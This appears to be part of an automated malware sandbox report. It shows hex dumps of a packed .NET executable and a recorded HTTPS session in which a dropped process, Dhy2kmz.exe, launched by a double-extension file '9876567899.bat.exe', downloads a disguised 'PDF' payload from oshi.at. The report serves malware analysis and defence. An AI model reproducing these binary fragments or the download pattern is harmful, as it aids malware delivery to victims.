                                                              2025-01-07 10:02:00 UTC3768INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 f1 7c 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 a8 00 00 00 0a 00 00 00 00 00 00 0e c6 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH|g @ `
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 00 00 00 02 03 0e 05 28 04 00 00 2b 2a 04 16 3c 08 00 00 00 07 10 02 38 11 00 00 00 04 07 3e 0a 00 00 00 02 04 0e 05 28 05 00 00 2b 2a 05 17 3c 03 00 00 00 17 10 03 03 06 59 0c 38 11 00 00 00 02 7b 06 00 00 04 08 17 6f 39 00 00 0a 08 05 58 0c 08 04 06 59 3e e6 ff ff ff 02 7b 07 00 00 04 03 3e 07 00 00 00 02 03 7d 07 00 00 04 08 06 05 59 58 0c 02 7b 08 00 00 04 08 3c 07 00 00 00 02 08 7d 08 00 00 04 0e 04 2a 00 00 00 13 30 04 00 27 00 00 00 09 00 00 11 73 3a 00 00 0a 0a 06 03 7d 3b 00 00 0a 06 02 7d 3c 00 00 0a 04 06 fe 06 3d 00 00 0a 73 95 00 00 06 6f 33 00 00 0a 2a 00 13 30 04 00 27 00 00 00 0a 00 00 11 73 3e 00 00 0a 0a 06 03 7d 3f 00 00 0a 06 02 7d 40 00 00 0a 04 06 fe 06 41 00 00 0a 73 95 00 00 06 6f 33 00 00 0a 2a 00 22 02 14 28 31 00 00 06 2a 00 00
                                                              Data Ascii: (+*<8>(+*<Y8{o9XY>{>}YX{<}*0's:};}<=so3*0's>}?}@Aso3*"(1*
                                                              2025-01-07 10:02:00 UTC4096INData Raw: ff ff ff 38 19 02 00 00 20 00 00 00 00 7e 94 00 00 04 7b 78 00 00 04 39 92 ff ff ff 26 20 00 00 00 00 38 87 ff ff ff 38 bd 01 00 00 20 05 00 00 00 7e 94 00 00 04 7b b2 00 00 04 3a 6e ff ff ff 26 20 00 00 00 00 38 63 ff ff ff 1b 8d 0c 00 00 01 25 16 72 58 04 00 70 a2 25 17 03 a2 25 18 72 5c 04 00 70 a2 25 19 11 04 a2 25 1a 72 22 04 00 70 a2 28 70 00 00 0a 73 19 00 00 06 7a 72 cc 04 00 70 1a 8d 01 00 00 01 25 16 03 a2 25 17 02 28 4e 00 00 06 13 01 12 01 28 71 00 00 0a a2 25 18 02 28 4f 00 00 06 13 01 12 01 28 71 00 00 0a a2 25 19 02 28 4d 00 00 06 13 02 12 02 fe 16 14 00 00 02 6f 26 00 00 0a a2 28 72 00 00 0a 73 19 00 00 06 7a 16 13 03 20 00 00 00 00 7e 94 00 00 04 7b 84 00 00 04 3a c4 fe ff ff 26 20 01 00 00 00 38 b9 fe ff ff 11 05 1f 39 3e 17 01 00 00 20
                                                              Data Ascii: 8 ~{x9& 88 ~{:n& 8c%rXp%%r\p%%r"p(pszrp%%(N(q%(O(q%(Mo&(rsz ~{:& 89>
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 00 00 00 00 7e 94 00 00 04 7b 5b 00 00 04 3a d3 ff ff ff 26 20 00 00 00 00 38 c8 ff ff ff 2a 00 1e 02 28 06 00 00 0a 2a 26 7e 3d 00 00 04 14 fe 01 2a 00 00 1a 7e 3d 00 00 04 2a 00 2e 73 7e 00 00 06 80 3e 00 00 04 2a 1e 02 28 06 00 00 0a 2a 0a 03 2a 00 1e 03 6f 96 00 00 06 7a 0a 03 2a 00 0a 14 2a 00 1e 02 28 06 00 00 0a 2a 13 30 05 00 be 00 00 00 16 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 03 00 00 00 66 00 00 00 3c 00 00 00 05 00 00 00 38 61 00 00 00 1b 8d 0c 00 00 01 25 16 72 58 04 00 70 a2 25 17 02 7b 9f 00 00 0a a2 25 18 72 9d 07 00 70 a2 25 19 11 00 a2 25 1a 72 22 04 00 70 a2 28 70 00 00 0a 73 19 00 00 06 2a 02 7b a0 00 00 0a 3a 2e 00 00 00 20 00 00 00 00 7e 94 00 00 04 7b a1 00 00 04 39 94 ff ff ff 26 20 00 00 00 00 38 89 ff
                                                              Data Ascii: ~{[:& 8*(*&~=*~=*.s~>*(**oz**(*0 8Ef<8a%rXp%{%rp%%r"p(ps*{:. ~{9& 8
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 73 50 58 20 04 00 00 00 62 20 cd eb 52 4b 61 7d 7a 00 00 04 20 21 00 00 00 28 a2 00 00 06 3a 23 f6 ff ff 26 20 15 00 00 00 38 18 f6 ff ff 7e 94 00 00 04 20 02 db 83 d7 20 cb a5 b2 6e 58 20 d3 1e 2a 80 58 20 13 60 a9 f1 61 7d a6 00 00 04 20 08 00 00 00 38 ed f5 ff ff 7e 94 00 00 04 20 6d 15 4b 74 20 01 00 00 00 62 20 da 2a 96 e8 61 7d 65 00 00 04 20 0c 00 00 00 38 c8 f5 ff ff 7e 94 00 00 04 20 a7 b1 22 f8 20 03 00 00 00 62 20 38 8d 15 c1 61 7d 86 00 00 04 20 43 00 00 00 38 a3 f5 ff ff 7e 94 00 00 04 20 34 4b 83 85 20 06 00 00 00 62 20 00 cd d2 60 61 7d b7 00 00 04 20 6c 00 00 00 28 a3 00 00 06 39 79 f5 ff ff 26 20 4b 00 00 00 38 6e f5 ff ff 7e 94 00 00 04 20 fd 17 78 0e 65 20 03 e8 87 f1 61 7d 96 00 00 04 20 0f 00 00 00 28 a2 00 00 06 3a 49 f5 ff ff 26 20
                                                              Data Ascii: sPX b RKa}z !(:#& 8~ nX *X `a} 8~ mKt b *a}e 8~ " b 8a} C8~ 4K b `a} l(9y& K8n~ xe a} (:I&
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 10 00 76 02 00 00 05 00 49 00 8b 00 01 01 00 00 90 02 a4 02 0d 00 53 00 95 00 a1 00 00 00 b8 02 61 00 00 00 53 00 99 00 80 01 10 00 ca 02 33 01 05 00 53 00 9c 00 00 01 10 00 d2 02 00 00 05 00 56 00 9f 00 11 00 3e 05 ab 00 21 00 91 06 fb 00 21 00 a2 06 ff 00 13 00 b5 06 ab 00 13 00 a3 07 ab 00 21 00 38 08 ab 00 01 00 48 08 99 01 01 00 62 08 99 01 21 00 76 08 ab 00 11 00 89 08 ab 00 36 00 8b 0c e8 02 16 00 a0 0c ec 02 16 00 b0 0c f7 02 16 00 c0 0c ec 02 16 00 d5 0c f7 02 36 00 2b 09 03 02 16 00 18 09 f8 01 06 00 1f 0b 99 01 06 00 33 0b 9c 02 11 00 52 0d ab 00 06 00 81 0b 99 01 06 00 94 0b 9c 02 13 00 98 0d ab 00 36 00 52 0e ab 00 36 00 67 0e ab 00 36 00 75 0e ab 00 36 00 88 0e ab 00 36 00 9c 0e ab 00 36 00 ad 0e ab 00 31 00 bf 0e ab 00 31 00 d5 0e ab 00 21
                                                              Data Ascii: vISaS3SV>!!!8Hb!v66+3R6R6g6u66611!
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 00 00 01 00 99 0f 00 00 02 00 db 0d 00 00 01 00 76 09 00 00 01 00 96 14 00 00 02 00 a0 14 00 00 01 00 b8 14 00 00 02 00 bc 14 00 00 03 00 c4 14 00 00 01 00 46 0c 00 00 02 00 b1 10 00 00 03 00 d4 14 00 00 04 00 dd 14 00 00 01 00 c8 0b 00 00 02 00 bc 14 00 00 03 00 d4 14 00 00 04 00 92 15 00 00 05 00 98 15 00 00 06 00 a2 15 00 00 01 00 bf 15 00 00 02 00 c0 07 00 00 01 00 da 09 00 00 01 00 f0 15 00 00 02 00 f6 15 00 00 01 00 91 09 00 00 02 00 c2 08 00 00 01 00 4c 17 00 00 01 00 ee 09 00 00 01 00 18 0d 00 00 01 00 ee 09 00 00 01 00 50 0d 00 00 01 00 ee 09 00 00 01 00 18 0d 00 00 01 00 44 18 00 00 01 00 ee 09 00 00 02 00 2e 10 00 00 01 00 31 0e 00 00 02 00 3a 0e 00 00 01 00 4b 0e 00 00 01 00 f0 1a 00 00 01 00 f9 1a 0a 00 70 00 10 00 e1 00 1a 00 ae 00 1a 00 01
                                                              Data Ascii: vFLPD.1:Kp
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 6c 73 00 76 61 6c 75 65 00 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 60 31 00 67 65 74 5f 44 65 66 61 75 6c 74 00 47 65 74 48 61 73 68 43 6f 64 65 00 54 6f 53 74 72 69 6e 67 00 46 6f 72 6d 61 74 00 49 46 6f 72 6d 61 74 50 72 6f 76 69 64 65 72 00 43 68 65 63 6b 53 65 70 61 72 61 74 65 64 41 64 61 70 74 65 72 00 56 69 73 69 74 49 6e 73 70 65 63 74 6f 72 00 3c 45 72 72 6f 72 50 72 6f 76 69 64 65 72 3e 6a 5f 5f 54 50 61 72 00 3c 56 61 6c 75 65 3e 6a 5f 5f 54 50 61 72 00 41 6e 61 6c 79 7a 65 53 6f 72 74 65 64 53 70 65 63 00 73 65 74 75 70 00 69 6e 66 6f 00 73 65 63 6f 6e 64 00 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 49 6e 66 6f 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 00 66 69 72 73 74 00 53 74 72 65 61 6d 69
                                                              Data Ascii: lsvalueEqualityComparer`1get_DefaultGetHashCodeToStringFormatIFormatProviderCheckSeparatedAdapterVisitInspector<ErrorProvider>j__TPar<Value>j__TParAnalyzeSortedSpecsetupinfosecondSerializationInfoSystem.Runtime.SerializationfirstStreami
                                                              2025-01-07 10:02:00 UTC676INData Raw: 72 49 6e 74 65 72 70 72 65 74 65 72 00 43 6f 75 6e 74 54 6f 6b 65 6e 69 7a 65 72 00 52 65 76 69 65 77 53 74 61 74 65 6c 65 73 73 41 75 64 69 74 6f 72 00 52 65 76 69 65 77 4c 69 74 65 72 61 6c 41 75 64 69 74 6f 72 00 61 70 70 6c 79 73 70 65 63 00 46 69 6e 64 53 70 65 63 00 41 6e 61 6c 79 7a 65 56 69 73 75 61 6c 53 6f 6c 76 65 72 00 6d 5f 53 65 67 6d 65 6e 74 65 64 49 74 65 72 61 74 6f 72 00 5f 41 6c 70 68 61 62 65 74 69 63 45 6e 75 6d 65 72 61 74 6f 72 00 6d 5f 41 75 64 69 74 6f 72 54 6f 6b 65 6e 69 7a 65 72 00 5f 50 72 6f 6a 65 63 74 53 6f 72 74 65 72 00 5f 4e 6f 64 65 43 61 63 68 65 00 57 72 69 74 65 41 75 64 69 74 6f 72 00 52 65 76 69 65 77 49 74 65 72 61 62 6c 65 41 75 64 69 74 6f 72 00 52 65 73 74 61 72 74 41 75 64 69 74 6f 72 00 41 6e 61 6c 79 7a 65
                                                              Data Ascii: rInterpreterCountTokenizerReviewStatelessAuditorReviewLiteralAuditorapplyspecFindSpecAnalyzeVisualSolverm_SegmentedIterator_AlphabeticEnumeratorm_AuditorTokenizer_ProjectSorter_NodeCacheWriteAuditorReviewIterableAuditorRestartAuditorAnalyze
                                                              2025-01-07 10:02:00 UTC4096INData Raw: 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 74 6f 72 2e 67 65 74 5f 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 62 6c 65 3c 53 79 73 74 65 6d 2e 44 61 74 65 54 69 6d 65 3e 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 62 6c 65 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 49 45 6e 75 6d 65 72 61 62 6c 65 00 46 69 6e 69 73 68 52 65 61 64 61 62 6c 65 49 6e 73 70 65 63 74 6f 72 00 53 74 6f 70 4d 61 70 70 65 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e
                                                              Data Ascii: tSupportedExceptionSystem.Collections.IEnumerator.get_CurrentSystem.Collections.Generic.IEnumerable<System.DateTime>.GetEnumeratorSystem.Collections.IEnumerable.GetEnumeratorIEnumerableFinishReadableInspectorStopMapperSystem.Collections.Generic.IEn


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549713194.15.112.2484436552C:\Users\user\AppData\Roaming\Dhy2kmz.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-07 10:02:02 UTC186OUTGET /BLZu HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                              Host: oshi.at
                                                              Connection: Keep-Alive
                                                              2025-01-07 10:02:03 UTC308INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 07 Jan 2025 10:02:03 GMT
                                                              Content-Type: application/pdf
                                                              Content-Length: 1691144
                                                              Connection: close
                                                              Accept-Ranges: bytes
                                                              Last-Modified: Tue, 07 Jan 2025 09:16:51 GMT
                                                              Content-Disposition: attachment; filename=wfFz.pdf
                                                              ETag: "085f1877234f1fc3e64a1fb7d3d8e87f"
                                                              2025-01-07 10:02:03 UTC3775INData Raw: 18 b8 9f 15 1d c6 05 54 e2 1d bf b3 43 f4 40 fd ba d6 44 c9 70 38 88 83 c4 c5 f6 37 44 7a 19 b5 71 c1 4e 47 52 29 c7 10 95 6a ad ca 5d 14 4c a0 7a 3e c9 c7 03 9a a7 a0 56 a8 86 7f bd 0d 99 49 4a b1 6a c0 90 12 8f 40 ae 40 ec af f6 23 bc f4 6f 03 f2 b6 de 65 f4 17 cb 3a 3d c9 96 44 c8 08 32 18 5c 7c c0 92 74 cf 2d 0c 28 25 5c 6f 79 fc ad 04 9f 4d 39 fc 0a 00 06 44 9f 65 f7 9d e0 b9 b0 08 87 51 ce 60 8f 79 d1 ad 22 b8 3a 8d 6e 0c ce 10 d9 e4 5b 1c 57 2b 22 75 9b fd 3e 84 2c 2d 7d 40 84 4b 1d 80 9f 3d 8b d2 e3 cc 95 d7 aa 06 53 03 9d 95 71 83 b6 ad d5 00 52 ec e9 13 c2 28 6d fe 40 b8 6e 09 26 ca 20 38 18 bf 8f dd 67 63 fc ac 40 30 b1 cc 22 48 0d 8e 71 5e 33 71 a1 b8 43 b3 74 14 18 51 86 67 f4 20 7a c1 a8 4c 73 e9 d9 c5 cb 1b 83 b2 a9 6e 59 93 34 ce 18 92 23
                                                              Data Ascii: TC@Dp87DzqNGR)j]Lz>VIJj@@#oe:=D2\|t-(%\oyM9DeQ`y":n[W+"u>,-}@K=SqR(m@n& 8gc@0"Hq^3qCtQg zLsnY4#
                                                              2025-01-07 10:02:03 UTC4096INData Raw: 73 b1 69 29 cb 33 c6 cb 50 bc cd 36 c9 8d 4c 4e df bf 6c b0 1a 38 a0 ef 8f c9 1f 02 3a 7a 9a 7f 0a 48 54 ec 50 f9 e2 80 52 3f 6c 8d c5 58 45 eb 38 19 39 d0 dd 92 5b 06 7a e6 99 0a 5b e3 b9 f6 29 64 75 1a a4 2d 40 dd 3c dd 09 80 91 d4 e6 10 0c 02 65 80 9b a7 56 24 3c b7 3f 13 49 91 ac af cb 89 bf 28 af b2 cd 15 bc bd d5 3c 2f 58 cb 12 fe 80 f4 dd fe c0 94 38 c9 ea 23 dc 55 89 c2 63 b2 c4 ec 9b 94 73 7b b7 58 b5 78 ef 8c 8b 78 31 5b 34 22 8c 85 21 98 52 f1 4c 93 66 a6 78 ab d8 6d 81 08 c1 81 e8 e5 c2 66 4b 01 0f 6f 61 cb e6 a1 9d b0 47 38 cb 53 90 bd 3f 3a f3 6f a4 55 28 e8 be a1 3e ff 7d 5f d4 52 13 03 db fd b6 aa 76 30 1e 8e c3 6e ba 77 54 25 2c 42 8e 01 08 4a 7a b0 57 08 22 72 c9 15 20 c5 fc 6d 02 37 1e e4 d0 55 55 f2 70 6b f5 43 b1 68 69 53 a9 fe 1a 0a
                                                              Data Ascii: si)3P6LNl8:zHTPR?lXE89[z[)du-@<eV$<?I(</X8#Ucs{Xxx1[4"!RLfxmfKoaG8S?:oU(>}_Rv0nwT%,BJzW"r m7UUpkChiS
                                                              2025-01-07 10:02:03 UTC4096INData Raw: e2 4d 46 0e b9 bb 35 2d 90 17 81 8b 6d 7e 76 c6 13 33 90 cb d4 ee 5b 4e 78 10 58 eb 00 95 44 a7 14 3c 57 78 2d ae 3a 99 27 75 56 a7 48 18 8a 90 8d 97 8f 99 25 0a 5f 62 04 39 9f 2d 7a be cb 86 dc a7 cf 50 91 d8 c4 1b bc 35 fe 25 22 24 9f 92 6b 30 47 76 06 8f b1 5b 2d 60 f8 de 32 aa 57 79 d5 9e 63 63 19 4e c4 c9 ac 13 af a3 cc a4 bd 60 5b 8f d0 42 da b1 4f 26 42 19 96 73 56 14 f7 7b fa d9 23 58 ce 30 48 71 53 bc bf 52 73 21 cb 78 ae c3 76 ac 1f 01 6f 5a d4 b5 b5 1c e8 69 37 ae 9a e0 c0 72 d2 c1 65 be b9 1a 0b 03 2a c4 db fd e4 b6 9c 94 4c e7 e8 9b 50 af 2c fd 70 86 e2 7f c6 3d a6 36 c7 0c 21 65 62 48 90 b0 a1 b9 74 e7 eb 5b f5 f4 3b c9 97 5f f6 b7 e0 45 25 ad 8b a9 09 d4 fb ab 57 3f 07 d6 a8 05 01 3f 4c d5 d6 1b 38 af ac 5e 59 10 35 00 d5 45 7d 56 58 65 ef
                                                              Data Ascii: MF5-m~v3[NxXD<Wx-:'uVH%_b9-zP5%"$k0Gv[-`2WyccN`[BO&BsV{#X0HqSRs!xvoZi7re*LP,p=6!ebHt[;_E%W??L8^Y5E}VXe
                                                              2025-01-07 10:02:03 UTC4096INData Raw: f3 a2 4f e5 70 ae 5f 02 cb 5c 88 36 28 91 bf c8 ad bf 11 ee 28 8b d4 90 82 4e ab 4a 2b d0 f0 01 97 02 44 a9 9e c3 f9 5c 87 29 f3 56 bb 07 5d e8 84 51 aa fa e1 7d 82 6e 0a 84 c9 25 f1 7d b0 0e c9 36 7c a0 79 a7 8f af be 69 43 f9 c5 9d f9 e2 17 52 1b 0d 2c 4a 5d 22 f0 bd 24 e8 ce 33 79 8f b4 b8 06 7e e5 45 75 6e ae a7 59 da 91 5e 63 92 25 88 cf be d5 67 29 20 a9 97 58 df ec 85 7b 22 4d 07 52 1b a6 7e 15 8c 06 b3 f6 0e 67 15 85 cd bb af fd f3 78 81 f5 6b 61 0b bd 69 b2 5a e5 1a dd 7e 1d e5 08 28 95 5b dc ca 6f 01 9e 31 53 13 69 44 c9 c3 2c 68 f1 7e 75 1a 09 27 bd ff 7a 8e 49 ad 80 00 97 3d 65 4b 38 f3 04 a3 bf 88 ed 52 c9 2f 66 47 47 2e 84 61 0e d8 17 f6 e5 ac 89 f1 63 6b cb b0 eb d3 0f 12 6b e8 6b 9e 02 4d b3 ed 0f 7a 92 eb d3 8b f7 57 d0 25 13 15 c9 2f fa
                                                              Data Ascii: Op_\6((NJ+D\)V]Q}n%}6|yiCR,J]"$3y~EunY^c%g) X{"MR~gxkaiZ~([o1SiD,h~u'zI=eK8R/fGG.ackkkMzW%/
                                                              2025-01-07 10:02:03 UTC4096INData Raw: 0f dd 6f 74 d8 c9 b9 60 f5 06 5e af 2c 46 8c 31 2d 0f 97 a1 65 c3 72 a0 b3 85 c8 25 82 3d b3 79 e2 d2 4c df eb c3 c3 69 55 6b f6 fc 33 ce a2 da 45 44 18 55 7a 8a fe 80 8d 4a 9c b1 0f 15 19 da c6 e7 17 2b 74 ec 6a eb 13 0d 19 5c 70 57 9b b3 ea df 5c 66 99 7b 15 20 0b ca 03 f4 2b 32 da cc 7d bc 83 26 4c 28 01 5c 5b 68 0f 0a eb 51 38 3f 89 95 d5 71 27 1e ab 37 c9 96 57 84 77 28 a1 33 8c 19 0a e0 4e e0 14 d3 dc d7 9a 83 f7 5b 3e c4 ed 53 d9 f3 a4 33 ea c0 a4 9e d7 9d 00 ea d8 49 cf be ae b1 19 7b 8e 9b 10 94 a3 f1 a6 3d 39 18 36 7b 77 cc 14 26 96 d1 57 98 48 a8 f4 c6 77 9f cf 53 d3 ee b6 ec b8 eb 15 82 3c 52 d3 8a ac 68 0a 84 a4 7a 0e c4 11 bd 4c d5 d0 83 18 07 b3 68 01 26 e1 e6 a3 45 c3 a6 e7 76 69 5e aa bf 42 72 5c bb 08 e2 12 7f e1 96 24 c4 61 39 0e 44 e4
                                                              Data Ascii: ot`^,F1-er%=yLiUk3EDUzJ+tj\pW\f{ +2}&L(\[hQ8?q'7Ww(3N[>S3I{=96{w&WHwS<RhzLh&Evi^Br\$a9D
                                                              2025-01-07 10:02:03 UTC4096INData Raw: 7b 34 19 00 2f 03 b8 b9 73 63 f6 6d 58 3b 6d 56 dd 15 7e 9b 30 e3 bd 73 8b c9 5d 43 18 a9 10 37 ca 1f 3c a2 1f cf 35 1b eb ee 0a 96 a7 d8 10 fd f8 ee 1a 53 0a d2 35 d6 73 a1 9b d6 19 75 1a 12 d7 98 8f 8b 96 f8 d2 39 8a cf aa 93 f0 c7 fc db b4 4c c0 63 b9 9e 57 a0 d9 a9 46 36 18 54 80 c7 e3 c5 e3 23 a4 ba 23 1c 53 a6 78 26 d7 67 27 7b a1 91 77 1e 86 dd dd 0f d7 ff d6 86 ce 80 b0 89 3c 0e 82 a4 20 f6 3c 6a 52 c6 b9 f6 69 eb 57 e0 ef b8 22 f2 f9 3b fc 92 90 9a 4e f2 02 1f 88 14 fc f6 9f 66 2e a2 33 8f 0f df 7d 74 84 5b ac ee eb 1b 4e 7f f5 30 51 be 77 30 ee 5c 3d 66 87 d1 d4 7b 39 90 7b 57 7e 3c a2 e1 6a 27 02 13 d9 94 d9 20 5b 36 52 e2 e2 8d e1 8a 6c dc 62 3c 16 85 c4 f3 a0 4e eb 64 b0 f4 c0 54 ef 2d 8a fd 40 1c 75 82 c5 66 a4 28 99 41 92 29 e5 22 d1 db 52
                                                              Data Ascii: {4/scmX;mV~0s]C7<5S5su9LcWF6T##Sx&g'{w< <jRiW";Nf.3}t[N0Qw0\=f{9{W~<j' [6Rlb<NdT-@uf(A)"R
                                                              2025-01-07 10:02:03 UTC4096INData Raw: da 68 8d 95 12 df f1 58 fb a4 71 1a 65 74 bc 3d 7d a2 f4 cb 52 89 24 89 4c c7 66 92 83 92 e7 cc c1 bd 7f bc c4 ea 2d ca 21 f3 3c 0b c1 6d 2d 07 94 1f d0 09 f4 89 f5 f2 64 ca ab 13 9b b6 14 7b 27 ee bf 3d 0f d2 04 89 33 50 af 49 40 19 c5 a9 01 c9 5e 91 7d 30 14 44 c2 95 53 fb 09 55 54 14 70 dd a9 59 a1 17 2e f7 7c 5b d2 4a d6 ba b9 0c cf 98 a0 b1 5d 49 f6 d1 fd 73 dd d8 fd df ef ca df 51 cc 3a 93 63 e3 58 81 cd c5 41 be b7 65 97 75 5b 06 78 8a 06 d2 dc 61 91 30 5c fa 25 7d dc 6c e4 a0 5b 72 f5 0f da 7f 28 2d 5c f1 18 62 fc 2f bc be 6d 8f 40 44 98 e4 39 d7 74 dd 77 ec ed 96 3b 5a e8 ea 98 75 5a af 97 4d f9 3b f5 2e 08 13 d4 00 c7 19 f2 80 79 90 2f 83 62 21 fd 7c 2c f3 56 c7 d8 51 bd 43 fc 60 2f 49 5d 94 3a bb a3 1e 46 fb ce c1 79 61 e4 23 10 ee 0b c5 95 36
                                                              Data Ascii: hXqet=}R$Lf-!<m-d{'=3PI@^}0DSUTpY.|[J]IsQ:cXAeu[xa0\%}l[r(-\b/m@D9tw;ZuZM;.y/b!|,VQC`/I]:Fya#6
                                                              2025-01-07 10:02:03 UTC4096INData Raw: 08 f6 dc f5 1a f3 63 f3 91 d4 25 04 a6 88 e5 c8 f9 b2 ab ea ac ff f1 16 e7 35 cc 24 ef 77 dd fa f8 04 49 a5 ef 82 91 e1 0e 6e ed 82 a2 cd 99 8a 35 19 f6 ff e5 d5 f9 60 0c ca c1 5b ae 19 3d 84 c2 16 a0 2e 98 49 c5 7f 77 f6 8e e0 de 6f fa 84 04 9e 3c 16 34 6e e4 14 e8 45 a6 7f f0 f4 19 8c b6 78 9a 16 c9 27 8f a0 ec 40 5e ae fd 40 38 6a 0a 73 fc e9 14 8f 63 f4 90 71 20 b8 78 73 d3 94 40 6a 32 65 29 d2 0e 5e 15 f3 e4 bd 47 73 00 24 7a 3a cf 37 77 e5 0d 3f 7e 57 b6 97 7a e5 1a 2c d1 d3 b2 5f e6 d2 32 80 21 a0 82 2a 86 eb d5 82 99 37 a4 7c d5 27 73 c8 2f 73 98 5f f7 23 2f 9c 2c 3f 81 55 73 d6 18 24 8b 0c 0f ad 40 47 d7 2a e0 87 02 cf 64 e9 37 fd c9 2e d9 f4 54 4d fa 2b 0c 7d d8 78 0d e5 5e af 70 84 25 3e 9e 1a 6f b1 80 52 38 bf 83 e8 d1 22 39 e1 de 6a c7 54 f9
                                                              Data Ascii: c%5$wIn5`[=.Iwo<4nEx'@^@8jscq xs@j2e)^Gs$z:7w?~Wz,_2!*7|'s/s_#/,?Us$@G*d7.TM+}x^p%>oR8"9jT
                                                              2025-01-07 10:02:03 UTC676INData Raw: b4 70 ba f3 85 da c9 05 24 a3 10 0c 86 b7 80 90 50 b1 66 d5 67 da cc c2 e8 b9 eb cd 4f 19 6a 0a 3d 06 38 b8 0d 4e fa 43 6a 6c 9a 3b 2f 4c b2 d7 fb 69 92 39 1e a7 76 d3 30 62 55 1c b3 a9 35 3c c3 39 48 dc 56 d5 ad 75 1b aa 56 83 b2 d1 bc dc c2 d4 5d 24 3e 9e 35 9f 7a 44 02 ef 27 5d fb a5 55 c4 fb c4 2a a5 dd bf 33 f2 63 d9 6b d8 af 76 de 33 e5 e3 93 75 dc 51 fe e0 13 b8 c0 a0 95 fa 4a 3a 50 66 dd be b9 1a ed 87 5e 4c e9 bf e1 62 8f 96 7e c2 11 bb 8b aa 7f ab ba c4 15 3d f3 3b 93 e5 c0 23 c1 f2 3a 6e 7a 2b 95 f4 05 c5 0c a1 32 9b 5b 54 b2 c3 ce 93 f6 b9 d0 9e 7c ba 9b 30 ea df c9 1d 4c 1e 83 d7 7b 1e 27 3e 3c 9c d3 7a aa ba d9 bd 8c f8 78 4f 20 09 c8 f0 45 b1 fb 0c 2f fb 70 eb 45 18 bf db b2 84 86 6f 5e c4 81 ff 94 69 1c ef 7c 71 64 d7 d9 f6 bd 6a 1d 87 cc
                                                              Data Ascii: p$PfgOj=8NCjl;/Li9v0bU5<9HVuV]$>5zD']U*3ckv3uQJ:Pf^Lb~=;#:nz+2[T|0L{'><zxO E/pEo^i|qdj
                                                              2025-01-07 10:02:03 UTC2674INData Raw: 07 9f 82 f3 cf dc 5e 28 04 fd fe 57 73 c8 fc 84 14 9a 96 bc 79 ed 35 08 18 b4 5e 73 0a 9b 3a 4a 30 77 63 b9 e6 cc 77 f4 d7 b5 66 3e ad 2b 95 bc ce f7 e5 d3 42 f3 0a b5 de 18 0c 2b d1 a5 b2 5e 54 0b c7 93 96 33 2b b4 e0 d6 0f 87 b5 3e 75 e3 f7 74 a7 a2 2e 4f 3d 00 c4 6a 1f 7d 6c 17 da e7 0b 89 eb 81 59 98 bc 49 65 aa 41 b3 29 f2 35 60 0d 60 58 ab f2 c7 eb 38 a1 27 8f 21 8e 28 d3 d9 50 0a 8a e8 33 b6 07 4c 91 7a 94 52 08 5a 78 49 a3 ba bc bc 29 5f 80 52 41 ee 4b 9d 13 e4 9f 0d 18 f4 82 d5 99 ce b4 fe 80 e9 05 26 ed 47 ca 46 95 f4 ed e8 eb 83 f6 0e c4 85 50 54 bc de 66 31 36 03 6b a0 ad 98 ec a1 29 46 3d db be b0 a9 7c e2 8f 8f c4 e9 35 ae ce 10 79 cb ec 29 5c d3 94 6f 56 ef 08 e9 d0 bd 1d ee df f8 d6 19 3a cd d9 1b c2 c2 1c 69 51 85 b6 47 10 11 01 27 f7 ea
                                                              Data Ascii: ^(Wsy5^s:J0wcwf>+B+^T3+>ut.O=j}lYIeA)5``X8'!(P3LzRZxI)_RAK&GFPTf16k)F=|5y)\oV:iQG'


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:05:01:52
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\Desktop\9876567899.bat.exe
                                                              Wow64 process (32bit):true
